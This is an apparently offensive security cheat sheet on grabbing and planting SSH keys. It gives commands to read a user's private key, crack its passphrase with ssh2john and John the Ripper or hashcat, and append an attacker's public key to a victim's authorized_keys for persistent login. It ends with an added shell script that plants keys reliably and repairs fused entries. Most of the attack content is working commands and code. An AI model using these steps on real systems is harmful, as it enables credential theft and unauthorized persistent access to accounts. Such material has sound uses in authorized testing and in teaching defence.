SSH Private Key Grabbing and Planting
SSH Private Key Grabbing
An individual user's private SSH key can be read with
cat ~/.ssh/id_rsa
Sometimes the private key is protected with a passphrase. For keys in the legacy PEM format this is advertised by a Proc-Type: 4,ENCRYPTED header, as in the example below. Keys in the newer format (-----BEGIN OPENSSH PRIVATE KEY-----) carry no such header; the cipher and KDF name ("bcrypt" when a passphrase is set, "none" otherwise) sit inside the base64 blob. If the key is encrypted you will need to recover its passphrase, for example by converting it with ssh2john and running John the Ripper or hashcat against the result.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,4F7C6A9FD8FB74EDF6E605487045F91D

...
-----END RSA PRIVATE KEY-----
SSH Private Key Planting
Generate a key pair for the user you're trying to log in as; best practice is to protect it with a passphrase. ssh-keygen writes the private key to hal and the matching public key to hal.pub.
ssh-keygen -f hal
Place the newly generated public key (the contents of hal.pub) into the victim's authorized_keys file.
echo 'ssh-rsa ...' >> ~/.ssh/authorized_keys

Restrict the permissions on the newly generated private key; ssh refuses to use a key file that is readable by others ("UNPROTECTED PRIVATE KEY FILE").
chmod 600 hal
and enjoy your stable ssh connection (substitute the target user and host).
ssh -i hal <user>@<target>

Troubleshooting note: if the key doesn't work the first time, inspect the authorized_keys file. If the file did not end with a newline, the echo above will have glued your key onto the end of the last existing line, making your key unusable (and usually the existing one too). Appending again fixes the second copy, because the first echo left the file ending in a newline, so the new line lands by itself. Don't forget to repair the existing entry you broke by putting a newline back in front of your first copy.
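The planting steps above, done in a way that avoids the fused-line problem from the troubleshooting note, as an added example (not code from the original page). plant_key appends a public key line idempotently, creating ~/.ssh and the file with the permissions sshd insists on and inserting a newline first if the file lacks a trailing one; repair_fused splits any line on which a second key got glued to the first. It assumes POSIX sh, awk, sed and tail only; the function and argument names (PUBKEY, AUTH) are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): plant a public key into an
# account's authorized_keys without gluing it onto the previous line, and
# repair a file where that already happened. Assumes POSIX sh/awk/sed/tail.

# plant_key PUBKEY [AUTH]: append one "type base64 comment" line to AUTH
# (default ~/.ssh/authorized_keys) unless the same key material is present.
plant_key() {
    pubkey=$1
    auth=${2:-"$HOME/.ssh/authorized_keys"}
    dir=$(dirname "$auth")
    # sshd ignores the file when the directory or file is group/world writable.
    mkdir -p "$dir" && chmod 700 "$dir"
    touch "$auth" && chmod 600 "$auth"
    # Compare type + base64 only, so a re-run with a different comment is
    # still recognised as a duplicate.
    keymat=$(printf '%s\n' "$pubkey" | awk '{print $1, $2}')
    if awk -v k="$keymat" '($1 " " $2) == k {found=1} END {exit !found}' "$auth"; then
        return 0
    fi
    # A file that does not end in '\n' is exactly the case where "echo >>"
    # fuses two keys onto one line: terminate the last line first.
    if [ -s "$auth" ] && [ "$(tail -c 1 "$auth" | wc -l | tr -d ' ')" -eq 0 ]; then
        printf '\n' >> "$auth"
    fi
    printf '%s\n' "$pubkey" >> "$auth"
}

# repair_fused AUTH: print AUTH with every line split wherever a key-type
# token (ssh-rsa, ssh-ed25519, ssh-dss, ecdsa-sha2-nistp*) follows another
# character without a newline in between.
repair_fused() {
    awk '{
        line = $0
        while (match(line, /[^[:space:]]ssh-(rsa|ed25519|dss) /) ||
               match(line, /[^[:space:]]ecdsa-sha2-nistp[0-9]+ /)) {
            print substr(line, 1, RSTART)   # everything up to the glued join
            line = substr(line, RSTART + 1) # the key that was appended
        }
        print line
    }' "$1"
}

# Usage:
#   plant_key "$(cat hal.pub)"
#   repair_fused ~/.ssh/authorized_keys > /tmp/ak && cat /tmp/ak > ~/.ssh/authorized_keys
```

Writing the repaired file back with cat rather than mv keeps the original file's mode and ownership, which sshd checks before trusting its contents.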